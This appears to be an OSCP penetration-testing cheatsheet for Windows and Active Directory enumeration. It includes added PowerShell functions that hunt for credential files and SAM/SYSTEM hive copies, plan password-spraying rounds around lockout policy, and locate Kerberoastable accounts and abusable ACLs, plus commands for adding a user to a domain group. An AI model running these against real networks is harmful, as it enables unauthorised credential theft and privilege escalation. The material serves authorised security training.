OSCP Cheatsheet

Enumeration: Windows

NOTE: Information to collect during local enumeration of a Windows host:

  • Username and hostname
  • Group memberships of the current user
  • Existing users and groups
  • Operating system, version and architecture
  • Network information
  • Installed applications
  • Running processes

Interesting Files

To search for files by name or extension from cmd.exe (where /r recurses from the given root)

where /r C:\Users\ *.txt
where /r C:\ *.uac
where /r C:\ *.dll

dir C:\

where /r C:\ local.txt proof.txt

# Display hidden files as well (/a = all attributes; /a:h lists only hidden entries)
dir /a

To find specific files from PowerShell (-ErrorAction SilentlyContinue hides the access-denied noise from other users' profiles)

Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.ini,*.log,*.ps1 -File -Recurse -ErrorAction SilentlyContinue
	
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.kdbx -File -Recurse -ErrorAction SilentlyContinue
	
Get-ChildItem -Path C:\ -Include SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
	
Get-ChildItem -Path C:\ -Include local.txt,proof.txt -File -Recurse -ErrorAction SilentlyContinue

NOTE: The live hives under C:\Windows\System32\config are locked and need SYSTEM rights to copy; the search above is for stray copies (backups, C:\Windows\Repair, RegBack) that a lower-privileged user may be able to read.

# Display hidden files (ls is an alias for Get-ChildItem)
ls -Force
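The one-liners above list candidate files; a practitioner usually also wants to know which of them actually contain credential material. The function below is an added example (not code from the original page): it walks the usual roots, greps small text-type files for a handful of keyword patterns and always reports binary formats worth taking offline (KeePass databases, PFX/PPK keys, Office documents). The root list, extension lists and keyword patterns are assumptions to tune per engagement.

```powershell
# Added example: hunt for credential material in user profiles and web roots.
# Roots, extension lists and keyword patterns below are assumptions, not values from the page.
function Find-InterestingFiles {
    param(
        [string[]]$Roots        = @("$env:SystemDrive\Users", "$env:SystemDrive\inetpub", "$env:SystemDrive\xampp"),
        [string[]]$TextTypes    = @('*.txt','*.ini','*.config','*.xml','*.ps1','*.bat','*.cmd','*.log','*.rdp','*.vbs'),
        [string[]]$AlwaysReport = @('*.kdbx','*.pfx','*.ppk','*.docx','*.xlsx','*.pdf'),
        [string[]]$Patterns     = @('password','passwd','pwd=','secret','apikey','connectionstring','BEGIN RSA'),
        [int]$MaxSizeKB = 512   # skip grepping big logs; they are still listed if they match AlwaysReport
    )
    Get-ChildItem -Path $Roots -Include ($TextTypes + $AlwaysReport) -File -Recurse -Force -ErrorAction SilentlyContinue |
      ForEach-Object {
        # Only plain-text formats are grepped; Office/KeePass/key files are reported by extension alone.
        $isText = $TextTypes -contains ('*' + $_.Extension)
        $hits = @()
        if ($isText -and $_.Length -lt ($MaxSizeKB * 1KB)) {
            $hits = @(Select-String -Path $_.FullName -Pattern $Patterns -SimpleMatch -ErrorAction SilentlyContinue)
        }
        if ($hits.Count -gt 0 -or -not $isText) {
            [pscustomobject]@{
                Path    = $_.FullName
                SizeKB  = [math]::Round($_.Length / 1KB, 1)
                Written = $_.LastWriteTime
                Hits    = ($hits | Select-Object -First 3 | ForEach-Object { $_.Line.Trim() }) -join ' | '
            }
        }
      }
}

# Newest files first: recently written configs and scripts are the ones most likely to hold live credentials.
Find-InterestingFiles | Sort-Object Written -Descending | Format-Table -AutoSize -Wrap
```

Run it from a PowerShell prompt on the target; anything under another user's profile that you cannot read is skipped silently, so an empty result for C:\Users\<other> usually means a permissions boundary rather than an absence of files.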

User Permissions

Username

whoami

Full token information: SID, privileges and group memberships

whoami /all

NOTE: whoami /all combines the output of the three commands below. In the /priv output, look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeBackupPrivilege, SeRestorePrivilege and SeDebugPrivilege, since each of these has a well-known local privilege-escalation path.

whoami /user
whoami /priv
whoami /groups

User Enumeration

List all users (local accounts; add /domain to query the domain controller instead)

net user [/domain]
Get-LocalUser

Get information on a particular user (last logon, password last set, group memberships)

net user <Username> [/domain]

List groups (net group needs /domain unless run on a domain controller; Get-LocalGroup lists local groups)

net group [/domain]
Get-LocalGroup

List the members of a local group

Get-LocalGroupMember "<Group Name>"

List the members of a particular domain group

net group <Group Name> /domain

List local administrators

net localgroup administrators

List SMB shares hosted on this machine

net share

Get the password and lockout policy (check the lockout threshold before any password spraying)

net accounts
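The reason to run net accounts before spraying is the lockout threshold and observation window. The function below is an added example (not from the original page): it parses the net accounts output into a small policy object and turns it into a per-round spraying budget. The sample output embedded at the bottom is constructed for offline testing; with no argument the function reads the live domain policy. The function name and the two-attempt safety margin are assumptions.

```powershell
# Added example: derive a password-spraying budget from the domain lockout policy.
function Get-LockoutBudget {
    param(
        [string[]]$NetAccountsOutput = (net accounts /domain 2>$null),  # live policy by default
        [int]$SafetyMargin = 2        # attempts kept in reserve below the threshold (assumption)
    )
    # net accounts prints "Label:   value" lines; collect them into a hashtable.
    $policy = @{}
    foreach ($line in $NetAccountsOutput) {
        if ($line -match '^(?<key>[^:]+?):\s+(?<val>\S.*)$') {
            $policy[$Matches.key.Trim()] = $Matches.val.Trim()
        }
    }
    $threshold = $policy['Lockout threshold']
    $window    = $policy['Lockout observation window (minutes)']

    $result = [pscustomobject]@{
        LockoutThreshold  = $threshold
        ObservationWindow = $window
        MinPasswordLength = $policy['Minimum password length']
        SafeAttempts      = $null
        Advice            = $null
    }
    if (-not $threshold -or $threshold -eq 'Never') {
        # No lockout: spraying is not rate-limited by policy, but every failure is still logged (4625/4771).
        $result.SafeAttempts = [int]::MaxValue
        $result.Advice = 'No lockout policy; volume is limited only by detection, not by lockout.'
    } else {
        # The bad-password counter resets after the observation window, so each round may use
        # threshold - margin attempts, followed by a pause of at least the window length.
        $result.SafeAttempts = [math]::Max(0, [int]$threshold - $SafetyMargin)
        $result.Advice = "At most $($result.SafeAttempts) password(s) per user per round, then wait $window minutes before the next round."
    }
    $result
}

# Constructed sample (not real output from any host) so the parser can be exercised offline.
$sample = @'
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Minimum password length:                              7
'@ -split "`n"
Get-LockoutBudget -NetAccountsOutput $sample | Format-List
```

With the constructed sample this reports 3 safe attempts per user and a 30-minute pause between rounds. A domain fine-grained password policy (PSO) can override these values for specific groups, so the LDAP policy for the accounts you intend to spray is worth checking too.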

LDAP Search Script

Save the following function to a .ps1 file, for example with

notepad "<Path/to/script.ps1>"

function LDAPSearch {
    param (
        [string]$LDAPQuery
    )

    # Bind to the PDC emulator of the current domain and search from the domain root.
    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName

    $DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")

    # Runs with the caller's current credentials. No PageSize is set, so results are capped
    # by the DC's MaxPageSize (1000 by default) in large domains.
    $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)

    return $DirectorySearcher.FindAll()

}

Load the function into the current PowerShell session (dot-sourcing with . .\script.ps1 works as well)

Import-Module .\script.ps1

To enumerate users (samAccountType 805306368 selects normal user accounts)

LDAPSearch -LDAPQuery "(samAccountType=805306368)"

To enumerate groups

LDAPSearch -LDAPQuery "(objectclass=group)"

To display the members of each group

foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {$group.properties | select {$_.cn}, {$_.member}}

To display the members of a particular group

$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=<Group Name>))"
$group.properties.member

To display all attributes of a particular user (description fields sometimes contain passwords)

$user = LDAPSearch -LDAPQuery "(&(objectCategory=user)(cn=<Username>))"
$user.properties
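The queries above show the mechanics; what a practitioner wants next is a set of filters that surface the accounts worth attacking. The block below is an added example (not the page's own script): it extends the same DirectorySearcher approach with result paging and a property whitelist, then runs a few high-value LDAP filters (Kerberoastable users, AS-REP roastable users, unconstrained delegation, passwords in description fields, direct Domain Admins members). The function name, the property list and the choice of filters are assumptions; the userAccountControl bit values and the bitwise-AND matching rule OID are standard.

```powershell
# Added example: paged LDAP search with a property whitelist, plus filters that matter for an assessment.
# Assumes a domain-joined host and the caller's current credentials, like the LDAPSearch function above.
function Invoke-LdapQuery {
    param(
        [Parameter(Mandatory)][string]$Filter,
        [string[]]$Properties = @('samaccountname','cn','description','memberof','serviceprincipalname','useraccountcontrol','pwdlastset'),
        [int]$PageSize = 1000
    )
    $pdc  = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $base = ([adsi]'').distinguishedName
    $root = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$pdc/$base")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root, $Filter)
    $searcher.PageSize = $PageSize                 # paging: without it the DC silently truncates at MaxPageSize
    $searcher.PropertiesToLoad.AddRange($Properties) # only pull what we need; much faster in big domains
    foreach ($r in $searcher.FindAll()) {
        $o = [ordered]@{}
        foreach ($p in $Properties) {
            # Multi-valued attributes (memberOf, servicePrincipalName) are flattened for table output.
            $o[$p] = ($r.Properties[$p] | ForEach-Object { $_ }) -join '; '
        }
        [pscustomobject]$o
    }
}

# userAccountControl bit flags, tested with the LDAP_MATCHING_RULE_BIT_AND OID 1.2.840.113556.1.4.803.
$UAC_ACCOUNTDISABLE         = 2
$UAC_TRUSTED_FOR_DELEGATION = 524288
$UAC_DONT_REQ_PREAUTH       = 4194304
$domainDN = ([adsi]'').distinguishedName

$queries = [ordered]@{
    'Kerberoastable (enabled user with an SPN, krbtgt excluded)' =
        "(&(samAccountType=805306368)(servicePrincipalName=*)(!(samAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=$UAC_ACCOUNTDISABLE)))"
    'AS-REP roastable (pre-authentication not required)' =
        "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=$UAC_DONT_REQ_PREAUTH))"
    'Unconstrained delegation (users and computers)' =
        "(userAccountControl:1.2.840.113556.1.4.803:=$UAC_TRUSTED_FOR_DELEGATION)"
    'Description mentions a password' =
        "(&(objectCategory=person)(|(description=*pass*)(description=*pwd*)))"
    'Direct members of Domain Admins' =
        "(&(objectCategory=person)(memberOf=CN=Domain Admins,CN=Users,$domainDN))"
}

foreach ($q in $queries.GetEnumerator()) {
    "`n=== $($q.Key) ==="
    Invoke-LdapQuery -Filter $q.Value | Format-Table samaccountname, description, serviceprincipalname -AutoSize
}
```

Each filter is plain LDAP, so the same strings can be reused with ldapsearch from Kali once you have credentials. The Domain Admins query only lists direct members; nested membership is what BloodHound (below) resolves for you.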

System Enumeration

Get the key facts (OS, version, architecture, domain membership, NICs)

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"

Get listening ports and established connections with their owning PIDs

netstat -ano

Get network configuration (all adapters, DNS servers, DHCP, DNS suffix)

ipconfig /all

Detect whether the current shell is cmd.exe or PowerShell (prints CMD in one and PowerShell in the other)

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
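netstat -ano gives PIDs, and the list of running processes is still on the checklist at the top of the page; the useful next step is joining the two. The function below is an added example (not from the original page): it maps every listening TCP port to its process name, binary path and, in an elevated shell, the account it runs as, and flags loopback-only listeners, which are the ones that later need port forwarding. It assumes Get-NetTCPConnection is available (Windows 8 / Server 2012 and later); the function name is an assumption.

```powershell
# Added example: listening ports joined with their owning process, binary and user.
function Get-ListeningPortMap {
    # -IncludeUserName needs an elevated shell; fall back to the plain process list otherwise.
    $procList = try { Get-Process -IncludeUserName -ErrorAction Stop } catch { Get-Process }
    $procs = @{}
    foreach ($p in $procList) { $procs[[int]$p.Id] = $p }

    Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
      Sort-Object LocalPort, LocalAddress |
      ForEach-Object {
        $p = $procs[[int]$_.OwningProcess]
        [pscustomobject]@{
            LocalAddress = $_.LocalAddress
            Port         = $_.LocalPort
            PID          = $_.OwningProcess
            Process      = if ($p) { $p.ProcessName } else { '?' }
            # UserName only exists on the objects when -IncludeUserName succeeded.
            User         = if ($p -and $p.PSObject.Properties['UserName']) { $p.UserName } else { '?' }
            # Path is empty for protected/system processes we cannot open.
            Path         = if ($p -and $p.Path) { $p.Path } else { '?' }
            # Bound to loopback only: reachable from this host, so a port-forward candidate.
            LoopbackOnly = ($_.LocalAddress -in @('127.0.0.1', '::1'))
        }
      }
}

Get-ListeningPortMap | Format-Table -AutoSize
```

Services listening on 127.0.0.1 that run as SYSTEM (local database instances, management agents) are worth a closer look, since they were never exposed to the network scan that got you here.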

Installed programs

List installed programs from both uninstall hives (Wow6432Node holds 32-bit applications on a 64-bit host); compare with the contents of C:\Program Files and C:\Program Files (x86) for software that never registered an uninstaller

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Web Root Directory

dir C:\inetpub\wwwroot
dir C:\xampp\htdocs
dir C:\<Directory Name>\xampp\htdocs

NOTE: Files and directory names that indicate a web root (look there for configuration files holding database credentials):

  • .htaccess
  • public_html
  • www
  • htdocs
  • httpdocs

Get History

Get-History only covers the current session; the PSReadline history file (ConsoleHost_history.txt under the user's AppData) persists across sessions and can be read directly for every profile you have access to

Get-History
(Get-PSReadlineOption).HistorySavePath

PowerView

NOTE: Remember to run the following first (-ep bypass sidesteps the execution policy for this session only)

  • powershell -ep bypass
  • Import-Module .\PowerView.ps1

Enumerate Users in the Domain

Get-NetUser

To select specific fields (property names are the LDAP attribute names)

Get-NetUser | select <Field Name> ...

EXAMPLE:

Get-NetUser | select samaccountname, cn, pwdlastset, lastlogon

To get specific information of a particular user

Get-NetUser <Username>

Enumerate Groups in the Domain

Get-NetGroup

To select specific fields

Get-NetGroup | select <Field name> ...

EXAMPLE:

Get-NetGroup | select cn

To get specific information of a particular group

Get-NetGroup <Group Name>

Get users with an SPN set (Kerberoasting candidates)

Get-NetUser -SPN | select <Field name> ...

EXAMPLE:

Get-NetUser -SPN | select samaccountname, serviceprincipalname

Enumerate Computers in the Domain

Get-NetComputer

To select specific fields

Get-NetComputer | select <Field name> ...

EXAMPLE:

Get-NetComputer | select operatingsystem, dnshostname

To get specific information of a particular computer

Get-NetComputer <DNS Host Name>

To look for machines where the current user has local administrator rights

Find-LocalAdminAccess

To look for logged-on users on a target machine

Get-NetSession -ComputerName <Computer Name> -Verbose

NOTE: On Windows 10 1709 / Server 2019 and later, NetSessionEnum no longer returns session data to ordinary domain users by default, so an empty result does not mean nobody is logged on. Permissions for NetSessionEnum are defined in the SrvsvcSessionInfo value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity.

Alternatives

C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>

NOTE: PsLoggedon needs the Remote Registry service running on the remote machine

To check the permissions on that key

Get-Acl -Path <Registry Hive>:<Registry Path> | fl

EXAMPLE:

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl

To enumerate the ACEs on an object

Get-ObjectAcl -Identity "<Username | Group Name>"

NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier (the SID of the principal the ACE grants the right to)

To enumerate interesting ACLs, excluding the DnsAdmins entries present in every domain (-notmatch also works when the name carries a domain prefix)

Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -notmatch "DnsAdmins"} | ft

To list every ACE granting GenericAll on a group

Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

To list every ACE granting GenericWrite on a group

Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRights

NOTE: ActiveDirectoryRights is a flags enum, so rights combined in one ACE print as a comma-separated list; use -match instead of -eq to catch those as well.

To convert SIDs to names in bulk

"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToName

To convert a single SID to a name

Convert-SidToName "<SID>"

Add a user to a domain group (requires write rights over the group, such as a GenericAll or GenericWrite ACE found above)

net group "<Group Name>" <Username> /add /domain

To enumerate all shares in the domain

Find-DomainShare

To enumerate only the shares the current user can read

Find-DomainShare -CheckShareAccess
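The ACL commands above return every interesting ACE in the domain, then leave you to work out by hand which ones your own token can exercise. The function below is an added example (not PowerView's own code and not from the original page): it takes the SIDs carried by the current token (user plus all nested groups), runs Find-InterestingDomainAcl with GUIDs resolved, and keeps only the ACEs whose trustee is one of those SIDs and whose right is one of a chosen set of abusable rights. It assumes PowerView (dev branch, which provides Find-InterestingDomainAcl) is already imported in the session; the function name and the rights list are assumptions.

```powershell
# Added example: ACEs in the domain that the current token can actually use.
function Find-MyAbusableAcl {
    param(
        [string[]]$Rights = @('GenericAll','GenericWrite','WriteDacl','WriteOwner','WriteProperty','AllExtendedRights','ExtendedRight')
    )
    # Every SID the current token carries: the user plus all (nested) group memberships.
    $token   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids  = @($token.User.Value) + @($token.Groups | ForEach-Object { $_.Value })
    $pattern = $Rights -join '|'

    Find-InterestingDomainAcl -ResolveGUIDs -ErrorAction SilentlyContinue |
      Where-Object {
          # SecurityIdentifier is the trustee of the ACE; compare it as a SID string.
          ($mySids -contains ([string]$_.SecurityIdentifier)) -and
          ([string]$_.ActiveDirectoryRights -match $pattern)
      } |
      Select-Object @{n='Principal'; e={ $_.IdentityReferenceName }},
                    @{n='Rights';    e={ [string]$_.ActiveDirectoryRights }},
                    ObjectAceType,   # with -ResolveGUIDs: e.g. User-Force-Change-Password, Member
                    ObjectDN |
      Sort-Object ObjectDN, Principal
}

Find-MyAbusableAcl | Format-Table -AutoSize -Wrap
```

Read the Rights and ObjectAceType columns together: GenericAll or WriteDacl on a group means you can add members (the net group /add line above), WriteProperty with ObjectAceType Member means the same, and ExtendedRight with User-Force-Change-Password on a user means you can reset that user's password. The Find-InterestingDomainAcl call enumerates every object in the domain, so expect it to take a few minutes in a large environment.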

BloodHound

To import the collector script

Import-Module C:\Tools\Bloodhound.ps1

To start collection (CollectionMethod All includes session and ACL data; the output is a zip of JSON files to upload into the BloodHound GUI)

Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"

On Kali:

sudo neo4j start

NOTE: Head over to http://localhost:7474. On first login the credentials are neo4j / neo4j and you are forced to set a new password; use that password in the BloodHound client as well.

Username: neo4j

Password: arctic-iris-zipper-prism-courage-7161

WADComs